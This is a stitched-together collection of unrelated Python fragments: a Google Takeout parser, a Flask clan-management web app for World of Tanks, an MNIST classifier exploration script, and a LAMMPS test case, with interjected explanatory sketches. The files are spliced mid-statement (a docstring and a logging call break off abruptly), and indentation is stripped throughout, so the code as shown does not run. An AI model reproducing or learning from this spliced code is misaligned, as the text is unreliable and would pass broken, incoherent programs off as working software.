def dispatch_map(self) -> Dict[Path, HandlerFunction]:
res: Dict[Path, HandlerFunction] = {}
for f in self.takeout_dir.rglob("*"):
if f.name.startswith("."):
continue
if not f.is_file():
continue
rf = f.relative_to(self.takeout_dir)
# if user overrode some function, use that
user_handler: HandlerMatch = self.__class__._match_handler(
rf, self.additional_handlers
)
# user handler matched something
if not isinstance(user_handler, Exception):
# if not explicitly ignored by the handler map
if user_handler is not None:
res[f] = user_handler
continue
# don't raise errors here since the DEFAULT_HANDLER_MAP may handle parsing it
# try the default matchers
def_handler: HandlerMatch = self.__class__._match_handler(
rf, DEFAULT_HANDLER_MAP
)
# default handler
if not isinstance(def_handler, Exception):
# if not explicitly ignored by the handler map
if def_handler is not None:
res[f] = def_handler
continue
else:
# this is an exception specifying an unhandled file
# this shouldn't cause a fatal error, so don't check
# error_policy here, just warn the user
if self.warn_exceptions:
logger.warning(str(def_handler))
return res
def _log_handler(self, path: Path, handler: Any) -> None:
"""Log the path/function parsing it"""
rel_path = str(path)[len(str(self.takeout_dir)) + 1 :]
func_name: str = getattr(handler, "__name__", str(handler))
logger.info(f"Parsing '{rel_path}' using '{func_name}'")
def _parse_raw(self, filter_type: Optional[Type[BaseEvent]] = None) -> BaseResults:
"""Parse the takeout with no cache. If a filter is specified, only parses those files"""
handlers = self._group_by_return_type(filter_type=filter_type)
for cache_key, result_tuples in handlers.items():
for (path, itr) in result_tuples:
self._log_handler(path, itr)
yield from itr
def _handle_errors(self, results: BaseResults) -> BaseResults:
"""Wrap the results and handle any errors according to the policy"""
for e in results:
if not isinstance(e, Exception):
yield e
else:
if self.warn_exceptions:
logger.warning(str(e))
# return errors as part of the result, default
if self.error_policy == "yield":
yield e
# raise errors; crash
elif self.error_policy == "raise":
raise e
# ignore errors
elif self.error_policy == "drop":
continue
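The three error policies can be sketched outside the class (toy results stream, with `error_policy` passed as a plain argument):

```python
from typing import Iterable, Iterator, Union

Result = Union[int, Exception]


def handle_errors(results: Iterable[Result], error_policy: str) -> Iterator[Result]:
    # same shape as TakeoutParser._handle_errors, minus the logging
    for e in results:
        if not isinstance(e, Exception):
            yield e
        elif error_policy == "yield":
            yield e
        elif error_policy == "raise":
            raise e
        # "drop": ignore the exception and continue


stream = [1, ValueError("bad line"), 2]
```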
def parse(
self, cache: bool = False, filter_type: Optional[Type[BaseEvent]] = None
) -> BaseResults:
"""
Parses the Takeout
if cache is True, using
"""
The Web Application
~~~~~~~~~~~~~~~~~~~
Implementation of all request handlers and core functionality.
"""
import csv
import datetime
import os
import pickle
import logging
import hashlib
import tarfile
import calendar
from cStringIO import StringIO
from collections import defaultdict, OrderedDict
from functools import wraps
from datetime import timedelta
import jinja2
from flask import Flask, g, session, render_template, flash, redirect, request, url_for, abort, make_response, jsonify
from flask import Response
from flask_openid import OpenID
from flask_cache import Cache
from sqlalchemy import or_, and_, alias
from sqlalchemy.orm import joinedload, joinedload_all
from werkzeug.utils import secure_filename
from werkzeug.datastructures import Headers
from pytz import timezone
from . import config, replays, wotapi, util, constants, analysis
from .model import Player, Battle, BattleAttendance, Replay, BattleGroup, db_session, WebappData
# Set up Flask application
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = config.DATABASE_URI
app.config['SQLALCHEMY_ECHO'] = False
app.config['SECRET_KEY'] = config.SECRET_KEY
app.config['UPLOAD_FOLDER'] = config.UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # 16 MB at a time should be plenty for replays
cache = Cache(app, config={'CACHE_TYPE': 'simple'})
oid = OpenID(app, config.OID_STORE_PATH)
app.jinja_env.undefined = jinja2.StrictUndefined
app.jinja_env.filters['pretty_date'] = util.pretty_date
app.jinja_env.filters['int'] = int
app.jinja_env.globals['datetime'] = datetime
app.jinja_env.globals['STATISTICS_VISIBLE'] = config.STATISTICS_VISIBLE
# Uncomment to set up middleware in case we are behind a reverse proxy server
# from .util import ReverseProxied
# app.wsgi_app = ReverseProxied(app.wsgi_app)
# Set up error logging
if not app.debug and config.ERROR_LOG_FILE:
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler(config.ERROR_LOG_FILE, maxBytes=5 * 1024 * 1024, backupCount=5)
file_handler.setLevel(logging.WARNING)
file_handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'))
app.logger.addHandler(file_handler)
# Set up application logging
logger = logging.getLogger(__name__)
if config.LOG_FILE:
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler(config.LOG_FILE, maxBytes=5 * 1024 * 1024, backupCount=5)
file_handler.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
file_handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '))
logger.addHandler(file_handler)
@app.before_request
def csrf_protect():
if request.method == "POST":
token = session.pop('_csrf_token', None)
if not token or token != request.form.get('_csrf_token'):
flash('Invalid CSRF token. Please try again or contact an administrator for help.')
return redirect(url_for('index'))
# noinspection PyUnusedLocal
@app.teardown_appcontext
def shutdown_session(exception=None):
"""Remove the database session at the end of the request or when the application shuts down.
This is needed to use SQLAlchemy in a declarative way."""
db_session.remove()
def generate_csrf_token():
if '_csrf_token' not in session:
session['_csrf_token'] = hashlib.sha1(os.urandom(64)).hexdigest()
return session['_csrf_token']
app.jinja_env.globals['csrf_token'] = generate_csrf_token
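The token scheme above (generate once per session, pop on every POST so each token is single-use) can be sketched without Flask; the explicit `session` dict below is a stand-in for `flask.session`:

```python
import hashlib
import os


def generate_token(session):
    # lazily create a per-session token, as generate_csrf_token() does
    if '_csrf_token' not in session:
        session['_csrf_token'] = hashlib.sha1(os.urandom(64)).hexdigest()
    return session['_csrf_token']


def check_csrf(session, form):
    # mirrors csrf_protect(): pop the token so it cannot be replayed
    token = session.pop('_csrf_token', None)
    return bool(token) and token == form.get('_csrf_token')
```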
# decorates a decorator function to be able to specify parameters :-)
decorator_with_args = lambda decorator: lambda *args, **kwargs: \
lambda func: decorator(func, *args, **kwargs)
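The triple lambda above is a decorator factory: `decorator_with_args` turns a function expecting `(func, *args)` into a decorator that takes arguments. A small self-contained demonstration (the `multiply` decorator is hypothetical):

```python
from functools import wraps

decorator_with_args = lambda decorator: lambda *args, **kwargs: \
    lambda func: decorator(func, *args, **kwargs)


@decorator_with_args
def multiply(f, factor):
    # receives the wrapped function plus the decorator's own arguments
    @wraps(f)
    def wrapper(*a, **kw):
        return factor * f(*a, **kw)
    return wrapper


@multiply(3)
def add(x, y):
    return x + y
```

The same mechanism is what lets `require_role` below accept the allowed roles as a parameter.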
@app.before_request
def lookup_current_user():
g.player = None
if 'openid' in session:
# Checking if player exists for every request might be overkill
g.player = Player.query.filter_by(openid=session.get('openid')).first()
if g.player and g.player.locked:
g.player = None
session.pop('openid', None)
# noinspection PyPep8Naming
@app.before_request
def inject_constants():
"""
Inject some commonly used constants into the global object 'g' so they
don't have to be passed around everywhere.
:return:
"""
g.clans = config.CLAN_NAMES
g.clan_ids = config.CLAN_IDS
g.roles = config.ROLE_LABELS
g.PAYOUT_ROLES = config.PAYOUT_ROLES
g.WOT_SERVER_REGION_CODE = config.WOT_SERVER_REGION_CODE
g.DELETE_BATTLE_ROLES = config.DELETE_BATTLE_ROLES
g.COMMANDED_ROLES = config.COMMANDED_ROLES
g.CREATE_BATTLE_ROLES = config.CREATE_BATTLE_ROLES
g.ADMINS = config.ADMINS
g.ADMIN_ROLES = config.ADMIN_ROLES
g.PLAYER_PERFORMANCE_ROLES = config.PLAYER_PERFORMANCE_ROLES
g.RESERVE_SIGNUP_ALLOWED = config.RESERVE_SIGNUP_ALLOWED
g.MENU_LINKS = config.MENU_LINKS
g.MAP_URL = config.MAP_URL
g.STORE_REPLAYS_IN_DB = config.STORE_REPLAYS_IN_DB
g.DOWNLOAD_REPLAY_ROLES = config.DOWNLOAD_REPLAY_ROLES
def require_login(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if g.player is None or g.player.locked:
return redirect(url_for('login', next=request.url))
return f(*args, **kwargs)
return decorated_function
def require_clan_membership(f):
"""
Request handler decorator that only allows access to an URL
parametrized with the clan name if the logged in user is a member
of the clan.
:param f:
:return:
"""
@wraps(f)
def decorated_f(*args, **kwargs):
if g.player is None:
return redirect(url_for('login', next=request.url))
# Has to be a request handler with 'clan' as argument (e.g. /battles/<clan>/)
if 'clan' not in kwargs:
abort(500)
if g.player.clan != kwargs['clan'] and g.player.name not in config.ADMINS:
abort(403)
return f(*args, **kwargs)
return decorated_f
@decorator_with_args
def require_role(f, roles):
"""
Request handler decorator that requires the logged in user to have a certain
role, i.e. clan commander, treasurer, ...
:param f:
:param roles: iterable of strings with the allowed roles
:return:
"""
@wraps(f)
def decorated_f(*args, **kwargs):
if g.player is None:
return redirect(url_for('login', next=request.url))
if g.player.role not in roles and g.player.name not in config.ADMINS:
abort(403)
return f(*args, **kwargs)
return decorated_f
@app.route('/sync-players/')
@app.route('/sync-players/<int:clan_id>')
def sync_players(clan_id=None):
"""
Synchronize players in the database with Wargaming servers.
:param clan_id:
:return:
"""
if config.API_KEY == request.args.get('API_KEY'):
if clan_id:
clan_ids = [clan_id]
else:
clan_ids = config.CLAN_IDS.values()
for clan_id in clan_ids:
logger.info("Clan member synchronization triggered for " + str(clan_id))
webapp_data = WebappData.get()
webapp_data.last_sync_attempt = datetime.datetime.now()
db_session.add(webapp_data)
db_session.commit()
db_session.remove()
clan_info = wotapi.get_clan(str(clan_id))
player_ids = clan_info['data'][str(clan_id)]['members'].keys()
players_info = wotapi.get_players(player_ids)
member_info_data = {}
for i in xrange(0, len(player_ids), 20):
member_info_data.update(wotapi.get_players_membership_info(player_ids[i:i+20])['data'])
processed = set()
for player_id in player_ids:
player = clan_info['data'][str(clan_id)]['members'][player_id]
player_data = players_info['data'][player_id]
member_data = member_info_data[player_id]
p = Player.query.filter_by(wot_id=str(player['account_id'])).first()
if not player_data:
if p:
processed.add(p.id) # skip this guy later when locking players
logger.info("Missing player info of " + player['account_name'])
continue # API Error?
since = datetime.datetime.fromtimestamp(
float(member_data['joined_at']))
if p:
# Player exists, update information
processed.add(p.id)
p.name = player['account_name']
p.openid = 'https://'+config.WOT_SERVER_REGION_CODE+'.wargaming.net/id/' + str(player_id) + '-' + player['account_name'] + '/'
p.locked = False
p.clan = clan_info['data'][str(clan_id)]['tag']
p.role = player['role'] # role might have changed
p.member_since = since # might have rejoined
else:
# New player
p = Player(str(player['account_id']),
'https://'+config.WOT_SERVER_REGION_CODE+'.wargaming.net/id/' + str(player['account_id']) + '-' + player[
'account_name'] + '/',
since,
player['account_name'],
clan_info['data'][str(clan_id)]['tag'],
player['role'])
logger.info('Adding player ' + player['account_name'])
db_session.add(p)
# All players of the clan in the DB, which are no longer in the clan
for player in Player.query.filter_by(clan=clan_info['data'][str(clan_id)]['tag']):
if player.id in processed or player.id is None or player.locked:
continue
logger.info("Locking player " + player.name)
player.locked = True
player.lock_date = datetime.datetime.now()
db_session.add(player)
webapp_data.last_successful_sync = datetime.datetime.now()
db_session.add(webapp_data)
db_session.commit()
logger.info("Clan member synchronization successful")
else:
abort(403)
return redirect(url_for('index'))
@app.route("/")
def index():
"""
Front page with latest battles played and scheduled battles.
:return:
"""
if g.player:
latest_battles = Battle.query.filter_by(clan=g.player.clan).order_by('date desc').limit(3)
# Cache provinces owned for 60 seconds to avoid spamming WG's server
@cache.memoize(timeout=60)
def cached_provinces_owned(clan_id):
logger.info("Querying Wargaming server for provinces owned by clan " + str(clan_id) + " " + g.player.clan)
try:
return wotapi.get_provinces(clan_id)
except Exception:
logger.exception("Error querying WG server for provinces owned")
return None
@cache.memoize(timeout=60)
def cached_battle_schedule(clan_id):
logger.info("Querying Wargaming server for battle schedule of clan " + str(clan_id) + " " + g.player.clan)
try:
return wotapi.get_battle_schedule(clan_id)
except Exception:
logger.exception("Error querying WG server for battle schedule")
return None
provinces_owned = cached_provinces_owned(config.CLAN_IDS[g.player.clan])
total_revenue = 0
if provinces_owned:
for p in provinces_owned:
total_revenue += p['daily_revenue']
scheduled_battles = cached_battle_schedule(config.CLAN_IDS[g.player.clan])
else:
latest_battles = None
scheduled_battles = None
provinces_owned = None
total_revenue = 0
return render_template('index.html', clans=config.CLAN_NAMES, latest_battles=latest_battles,
scheduled_battles=scheduled_battles, provinces_owned=provinces_owned,
total_revenue=total_revenue, datetime=datetime)
@app.route('/admin')
@require_login
@require_role(config.ADMIN_ROLES)
def admin():
"""
Administration page.
:return:
"""
return render_template('admin.html', webapp_data=WebappData.get(), API_KEY=config.API_KEY)
@app.route('/help')
def help_page():
"""
Help page.
:return:
"""
return render_template('help.html')
@app.route('/attributions')
def attributions():
"""
Page with attributions and licencing information.
:return:
"""
return render_template('attributions.html')
@app.route('/login', methods=['GET', 'POST'])
@oid.loginhandler
def login():
"""
Login page.
:return:
"""
if g.player is not None:
return redirect(oid.get_next_url())
if request.method == 'POST':
openid = request.form.get('openid', "http://eu.wargaming.net/id")
if openid:
return oid.try_login(openid, ask_for=['nickname'])
return render_template('login.html', next=oid.get_next_url(),
error=oid.fetch_error())
@oid.after_login
def create_or_login(resp):
"""
This is called when login with OpenID succeeded and it's not
necessary to figure out if this is the user's first login or not.
This function has to redirect otherwise the user will be presented
with a terrible URL which we certainly don't want.
"""
session['openid'] = resp.identity_url
session['nickname'] = resp.nickname
player = Player.query.filter_by(openid=resp.identity_url, locked=False).first()
if player is not None:
flash(u'Signed in successfully', 'success')
session.permanent = True
g.player = player
return redirect(oid.get_next_url())
return redirect(url_for('create_profile', next=oid.get_next_url(),
name=resp.nickname))
@app.route('/create-profile', methods=['GET', 'POST'])
def create_profile():
"""
If this is the user's first login, the create_or_login function
will redirect here so that the user can set up his profile.
"""
if g.player is not None or 'openid' not in session or 'nickname' not in session:
return redirect(url_for('index'))
if request.method == 'POST':
wot_id = [x for x in session['openid'].split('/') if x][-1].split('-')[0]
if not wot_id:
flash(u'Error: Could not determine your player ID from the OpenID string. Contact an admin for help :-)',
'error')
return render_template('create_profile.html', next_url=oid.get_next_url())
player_data = wotapi.get_player(wot_id)
player_clan_info = wotapi.get_players_membership_info([wot_id])
if not player_data or not player_data['data'][str(wot_id)]:
flash(u'Error: Could not retrieve player information from Wargaming. Contact an admin for help :-)',
'error')
return render_template('create_profile.html', next_url=oid.get_next_url())
clan_ids_to_name = dict((v, k) for k, v in config.CLAN_IDS.iteritems())
clan_id = str(player_clan_info['data'][str(wot_id)]['clan']['clan_id'])
if clan_id not in config.CLAN_IDS.values():
flash(u'You have to be in one of the clans to login', 'error')
return render_template('create_profile.html', next_url=oid.get_next_url())
clan = clan_ids_to_name[str(clan_id)]
role = player_clan_info['data'][str(wot_id)]['role']
member_since = datetime.datetime.fromtimestamp(float(player_clan_info['data'][str(wot_id)]['joined_at']))
if not role:
flash(u'Error: Could not retrieve player role from wargaming server', 'error')
return render_template('create_profile.html', next_url=oid.get_next_url())
db_session.add(Player(wot_id, session['openid'], member_since, session['nickname'], clan, role))
db_session.commit()
logger.info("New player profile registered [" + session['nickname'] + ", " + clan +
# src/Classes/MSDS422/Module_05/exploring-mnist-v001.py
# Exploring MNIST with Binary Classification (Python SciKit Learn)
# program revised by <NAME> (2017/10/18)
# Using data from the MNIST dataset from Scikit Learn and
# beginning with code from chapter 3 of <NAME>. 2017.
# Hands-On Machine Learning with Scikit-Learn & TensorFlow:
# Concepts, Tools, and Techniques to Build Intelligent Systems.
# Sebastopol, Calif.: O'Reilly. [ISBN-13 978-1-491-96229-9]
# Source code available at https://github.com/ageron/handson-ml
# Relevant code examples in the Python notebook 03_classification.ipynb
# Data from MNIST may be used to evaluate machine learning classifiers.
# Here we will use a subset of the MNIST data to study binary classifiers.
# In particular, after exploring the entire MNIST data set, we will
# select a subset of the data... just the digits 0 and 6
# Scikit Learn documentation for this assignment:
# http://scikit-learn.org/stable/modules/model_evaluation.html
# http://scikit-learn.org/stable/modules/generated/
# sklearn.model_selection.KFold.html
# prepare for Python version 3x features and functions
# comment out for Python 3.x execution
# from __future__ import division, print_function, unicode_literals
# from future_builtins import ascii, filter, hex, map, oct, zip
# to obtain a listing of the results of this program,
# locate yourself in the working directory and
# execute the following command in a terminal or commands window
# python exploring-mnist-v001.py > listing-exploring-mnist-v001.txt
# Scikit Learn documentation for this assignment:
# http://scikit-learn.org/stable/auto_examples/classification/
# plot_classifier_comparison.html
# http://scikit-learn.org/stable/modules/generated/
# sklearn.naive_bayes.BernoulliNB.html#sklearn.naive_bayes.BernoulliNB.score
# http://scikit-learn.org/stable/modules/generated/
# sklearn.linear_model.LogisticRegression.html
# seed value for random number generators to obtain reproducible results
RANDOM_SEED = 1
RANDOM_SEED_MODEL = 9999
# import base packages into the namespace for this program
import numpy as np
import pandas as pd
# visualization utilities
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages # plot to pdf files
# user-defined function for displaying observations/handwritten digits
# adapted from Géron (2017) Python notebook code (default 10 images per row)
def plot_digits(instances, images_per_row = 10, **options):
size = 28
images_per_row = min(len(instances), images_per_row)
images = [instance.reshape(size,size) for instance in instances]
n_rows = (len(instances) - 1) // images_per_row + 1
row_images = []
n_empty = n_rows * images_per_row - len(instances)
images.append(np.zeros((size, size * n_empty)))
for row in range(n_rows):
rimages = images[row * images_per_row : (row + 1) * images_per_row]
row_images.append(np.concatenate(rimages, axis=1))
image = np.concatenate(row_images, axis=0)
plt.imshow(image, cmap = matplotlib.cm.binary, **options)
plt.axis('off')
# --------------------------------------------------------
# cross-validation scoring code adapted from Scikit Learn documentation
from sklearn.metrics import roc_auc_score
# specify the set of classifiers being evaluated
from sklearn.naive_bayes import BernoulliNB
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC
names = ["Naive_Bayes", "Logistic_Regression",
"Linear_SVM_C=0.1"]
classifiers = [BernoulliNB(alpha=1.0, binarize=0.5,
class_prior = [0.5, 0.5], fit_prior=False),
LogisticRegression(),
Pipeline((
("scaler", StandardScaler()),
("svc", SVC(kernel = 'linear',
probability = True, C = 0.1,
random_state = RANDOM_SEED_MODEL)),
))]
# --------------------------------------------------------
# import data from Scikit Learn and explore the data
# fetch_mldata was removed from scikit-learn; fetch_openml is the current API
from sklearn.datasets import fetch_openml
mnist = fetch_openml('mnist_784', version=1, as_frame=False)
mnist.target = mnist.target.astype(np.int64) # OpenML serves the labels as strings
print(mnist.keys()) # show structure of datasets Bunch object from Scikit Learn
# define arrays from the complete data set
mnist_X, mnist_y = mnist['data'], mnist['target']
# show structure of numpy arrays
# 70,000 observations, 784 explanatory variables/features
# features come from 28x28 pixel displays
# response is a single digit 0 through 9
print('\n Structure of explanatory variable array:', mnist_X.shape)
print('\n Structure of response array:', mnist_y.shape)
# note the sequential organization of the MNIST data with index plot
# route plot to external pdf file
with PdfPages('plot-mnist-index-plot.pdf') as pdf:
fig, axis = plt.subplots()
axis.set_xlabel('Sequence/Index number within MNIST Data Set')
axis.set_ylabel('MNIST Digit')
plt.title('Index Plot of MNIST Data Set')
plt.plot(mnist_y[:,])
pdf.savefig() # saves the current figure into a pdf page
plt.close()
# summarize the sequential structure of the MNIST data
# target/label and index values for the observations
# the first 60 thousand observations are often used as training data
# they cover the ten digits... arranged in order... that is, zeros come
# before ones, ones before twos, and so on
# but the observed digit frequencies are unequal
# examine the frequency distributions for the digits using pandas DataFrame
# the first 60 thousand observations are often used as training data
mnist_y_0_59999_df = pd.DataFrame({'label': mnist_y[0:60000,]})
print('\nFrequency distribution for 60,000 observations (for model building)')
print(mnist_y_0_59999_df['label'].value_counts(ascending = True))
# the last 10000 observations cover the ten digits
# these are often used as test data
# digits are arranged in order but the frequencies are unequal
mnist_y_60000_69999_df = pd.DataFrame({'label': mnist_y[60000:70000,]})
print('\nFrequency distribution for last 10,000 observations (holdout sample)')
print(mnist_y_60000_69999_df['label'].value_counts(ascending = True))
# in selecting handwritten digits to represent,
# we will randomly sample from digit representations
from sklearn.utils import resample
# display example data from the 28x28 pixel displays
# ten-page pdf file, 100 digit realizations on each page
# using examples from the full MNIST data set
#
# we customize the location within the subplot for each page using GridSpec
# see matplotlib documentation: http://matplotlib.org/users/gridspec.html
# begin by showing samples from the model building data (first 60000 observations)
with PdfPages('plot-mnist-handwritten-digits-model-building-data.pdf') as pdf:
for idigit in range(0,10):
# print('\nworking on digit', idigit)
# identify the index values from the first 60000 observations
# that have the label equal to a specific digit (idigit)
idigit_indices = \
mnist_y_0_59999_df.index[mnist_y_0_59999_df.label == idigit]
# obtain indices for 100 randomly sampled observations for this digit
show_indices = resample(idigit_indices, n_samples=100,
replace = False,
random_state = RANDOM_SEED).sort_values()
plt.figure(0)
plt.suptitle('Examples of MNIST Data for Digit ' + str(idigit))
# define beginning and ending row index for this digit
# generate ten rows of ten digits each
for j in range(0,10):
row_begin_index = j * 10
row_end_index = row_begin_index + 10
# print('row begin',row_begin_index, 'row_end', row_end_index)
this_row_indices = show_indices[row_begin_index:row_end_index]
example_images = np.r_[mnist_X[this_row_indices]]
# print(mnist_y[this_row_indices,])
plt.subplot2grid((10,1), (j,0), colspan=1)
# plot ten digits per row using user-defined function
plot_digits(example_images, images_per_row=10)
pdf.savefig()
plt.close()
# also show samples from the holdout data (last 10000 observations)
with PdfPages('plot-mnist-handwritten-digits-holdout-data.pdf') as pdf:
for idigit in range(0,10):
# print('\nworking on digit', idigit)
# identify the index values from the first 60000 observations
# that have the label equal to a specific digit (idigit)
idigit_indices = 60000 + \
mnist_y_60000_69999_df.index[mnist_y_60000_69999_df.label == idigit]
# obtain indices for 100 randomly sampled observations for this digit
show_indices = resample(idigit_indices, n_samples=100,
replace = False,
random_state = RANDOM_SEED).sort_values()
plt.figure(0)
plt.suptitle('Examples of MNIST Data for Digit ' + str(idigit))
# define beginning and ending row index for this digit
# generate ten rows of ten digits each
for j in range(0,10):
row_begin_index = j * 10
row_end_index = row_begin_index + 10
# print('row begin',row_begin_index, 'row_end', row_end_index)
this_row_indices = show_indices[row_begin_index:row_end_index]
example_images = np.r_[mnist_X[this_row_indices]]
# print(mnist_y[this_row_indices,])
plt.subplot2grid((10,1), (j,0), colspan=1)
# plot ten digits per row using user-defined function
plot_digits(example_images, images_per_row=10)
pdf.savefig()
plt.close()
# ------------------------------------------------------------------------
# select a subset of the model building data... observations for digits 0 and 1
# these will comprise the data we use in model development/building
# and to select "best" modeling methods within a cross-validation design
model_indices_for_zeros = \
mnist_y_0_59999_df.index[mnist_y_0_59999_df.label == 0]
model_indices_for_ones = \
mnist_y_0_59999_df.index[mnist_y_0_59999_df.label == 1]
model_indices = np.append(model_indices_for_zeros,
model_indices_for_ones)
model_y = np.r_[mnist_y[model_indices]]
model_X = np.r_[mnist_X[model_indices]]
model_data = np.concatenate((model_y.reshape(-1, 1), model_X), axis = 1)
# check on shape of the model_data array
print('\nShape of model_data:', model_data.shape)
# set up model_data for modeling work consisting of selected X and y rows
# let's put the y values in the first column and X values in remaining columns
# we are setting aside the zeros and ones from the last 10000 observations
# these will compose a hold-out sample for final testing of the selected model
# select a subset of the hold-out test data... observations for digits 0 and 1
holdout_indices_for_zeros = 60000 + \
mnist_y_60000_69999_df.index[mnist_y_60000_69999_df.label == 0]
holdout_indices_for_ones = 60000 + \
mnist_y_60000_69999_df.index[mnist_y_60000_69999_df.label == 1]
holdout_indices = np.append(holdout_indices_for_zeros,
holdout_indices_for_ones)
holdout_y = np.r_[mnist_y[holdout_indices]]
holdout_X = np.r_[mnist_X[holdout_indices]]
holdout_data = np.concatenate((holdout_y.reshape(-1, 1),
holdout_X), axis = 1)
# check on shape of the holdout_data array
print('\nShape of holdout_data:', holdout_data.shape)
# shuffle the rows because MNIST data rows have a sequence
# with lower digits coming before higher digits
# shuffle is by the first index, which is the rows
np.random.seed(RANDOM_SEED)
np.random.shuffle(model_data)
np.random.seed(RANDOM_SEED)
np.random.shuffle(holdout_data)
# --------------------------------------------------------
# specify the k-fold cross-validation design
from sklearn.model_selection import KFold
# ten-fold cross-validation employed here
# as an alternative to 10-fold cross-validation, a data set of this
# modest size would also be a reasonable candidate for
# leave-one-out cross-validation, at a higher computational cost
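The file breaks off before the evaluation loop itself; the following is a minimal standalone sketch of how a KFold/AUC comparison might proceed, mirroring the names, classifiers, and roc_auc_score setup imported above, but using synthetic stand-in data — none of this is the original author's code.

```python
import numpy as np
from sklearn.model_selection import KFold
from sklearn.metrics import roc_auc_score
from sklearn.naive_bayes import BernoulliNB
from sklearn.linear_model import LogisticRegression

rng = np.random.RandomState(1)
# stand-in for model_data: 200 observations, binary labels in column 0,
# features deliberately shifted by the label so they are informative
fake_y = rng.randint(0, 2, size=(200, 1)).astype(float)
fake_X = rng.rand(200, 20) + fake_y
data = np.concatenate((fake_y, fake_X), axis=1)

names = ["Naive_Bayes", "Logistic_Regression"]
classifiers = [BernoulliNB(alpha=1.0, binarize=0.5), LogisticRegression()]

kf = KFold(n_splits=10)
results = np.zeros((kf.get_n_splits(), len(names)))
for fold, (train_idx, test_idx) in enumerate(kf.split(data)):
    X_train, y_train = data[train_idx, 1:], data[train_idx, 0]
    X_test, y_test = data[test_idx, 1:], data[test_idx, 0]
    for j, clf in enumerate(classifiers):
        clf.fit(X_train, y_train)
        # area under the ROC curve on the held-out fold
        results[fold, j] = roc_auc_score(y_test, clf.predict_proba(X_test)[:, 1])
print(results.mean(axis=0))  # mean AUC per classifier across the ten folds
```

Averaging the per-fold AUC column-wise gives one comparable score per method, which is the usual way such a benchmarking design is summarized.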
# coding: utf-8
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
import numpy as np
import pandas as pd
import os
import re
from pyiron_base import state, ProjectHDFio
from pyiron_atomistics.atomistics.structure.atoms import Atoms
from pyiron_atomistics.lammps.lammps import Lammps
from pyiron_atomistics.lammps.base import LammpsStructure, UnfoldingPrism
from pyiron_atomistics.lammps.units import LAMMPS_UNIT_CONVERSIONS, UnitConverter
import ase.units as units
from pyiron_base._tests import TestWithCleanProject
class TestLammps(TestWithCleanProject):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.execution_path = os.path.dirname(os.path.abspath(__file__))
state.update({'resource_paths': os.path.join(os.path.dirname(os.path.abspath(__file__)), "../static")})
@classmethod
def tearDownClass(cls):
super().tearDownClass()
state.update()
def setUp(self) -> None:
super().setUp()
self.job = Lammps(
project=ProjectHDFio(project=self.project, file_name="lammps"),
job_name="lammps",
)
self.ref = Lammps(
project=ProjectHDFio(project=self.project, file_name="ref"),
job_name="ref",
)
# Creating jobs this way puts them at the right spot, but decouples them from our self.project instance.
# I still don't understand what's happening as deeply as I'd like (at all!) but I've been fighting with it too
# long, so for now I will just force the issue by redefining the project attribute(s). -<NAME>
self.project = self.job.project
self.ref_project = self.ref.project
def tearDown(self) -> None:
super().tearDown()
self.ref_project.remove_jobs_silently(recursive=True) # cf. comment in setUp
def test_selective_dynamics(self):
atoms = Atoms("Fe8", positions=np.zeros((8, 3)), cell=np.eye(3))
atoms.add_tag(selective_dynamics=[True, True, True])
self.job.structure = atoms
self.job._set_selective_dynamics()
self.assertFalse("group" in self.job.input.control._dataset["Parameter"])
atoms.add_tag(selective_dynamics=None)
atoms.selective_dynamics[1] = [True, True, False]
atoms.selective_dynamics[2] = [True, False, True]
atoms.selective_dynamics[3] = [False, True, True]
atoms.selective_dynamics[4] = [False, True, False]
atoms.selective_dynamics[5] = [False, False, True]
atoms.selective_dynamics[6] = [True, False, False]
atoms.selective_dynamics[7] = [False, False, False]
self.job.structure = atoms
self.job._set_selective_dynamics()
for constraint in ["x", "y", "z", "xy", "yz", "xz", "xyz"]:
self.assertTrue(
f"group___constraint{constraint}" in self.job.input.control._dataset["Parameter"],
msg=f"Failed to find group___constraint{constraint} in control"
)
def test_structure_atomic(self):
atoms = Atoms("Fe1", positions=np.zeros((1, 3)), cell=np.eye(3))
lmp_structure = LammpsStructure()
lmp_structure._el_eam_lst = ["Fe"]
lmp_structure.structure = atoms
self.assertEqual(
lmp_structure._dataset["Value"],
[
"Start File for LAMMPS",
"1 atoms",
"1 atom types",
"",
"0. 1.000000000000000 xlo xhi",
"0. 1.000000000000000 ylo yhi",
"0. 1.000000000000000 zlo zhi",
"",
"Masses",
"",
"1 55.845000",
"",
"Atoms",
"",
"1 1 0.000000000000000 0.000000000000000 0.000000000000000",
"",
],
)
def test_structure_charge(self):
atoms = Atoms("Fe1", positions=np.zeros((1, 3)), cell=np.eye(3))
atoms.set_initial_charges(charges=np.ones(len(atoms)) * 2.0)
lmp_structure = LammpsStructure()
lmp_structure.atom_type = "charge"
lmp_structure._el_eam_lst = ["Fe"]
lmp_structure.structure = atoms
self.assertEqual(
lmp_structure._dataset["Value"],
[
"Start File for LAMMPS",
"1 atoms",
"1 atom types",
"",
"0. 1.000000000000000 xlo xhi",
"0. 1.000000000000000 ylo yhi",
"0. 1.000000000000000 zlo zhi",
"",
"Masses",
"",
"1 55.845000",
"",
"Atoms",
"",
"1 1 2.000000 0.000000000000000 0.000000000000000 0.000000000000000",
"",
],
)
def test_available_versions(self):
self.job.executable = os.path.abspath(
os.path.join(
self.execution_path,
"..",
"static",
"lammps",
"bin",
"run_lammps_2018.03.16.sh",
)
)
self.assertTrue([2018, 3, 16] == self.job._get_executable_version_number())
self.job.executable = os.path.abspath(
os.path.join(
self.execution_path,
"..",
"static",
"lammps",
"bin",
"run_lammps_2018.03.16_mpi.sh",
)
)
self.assertTrue([2018, 3, 16] == self.job._get_executable_version_number())
def _build_water(self, y0_shift=0.):
density = 1.0e-24 # g/A^3
n_mols = 27
mol_mass_water = 18.015 # g/mol
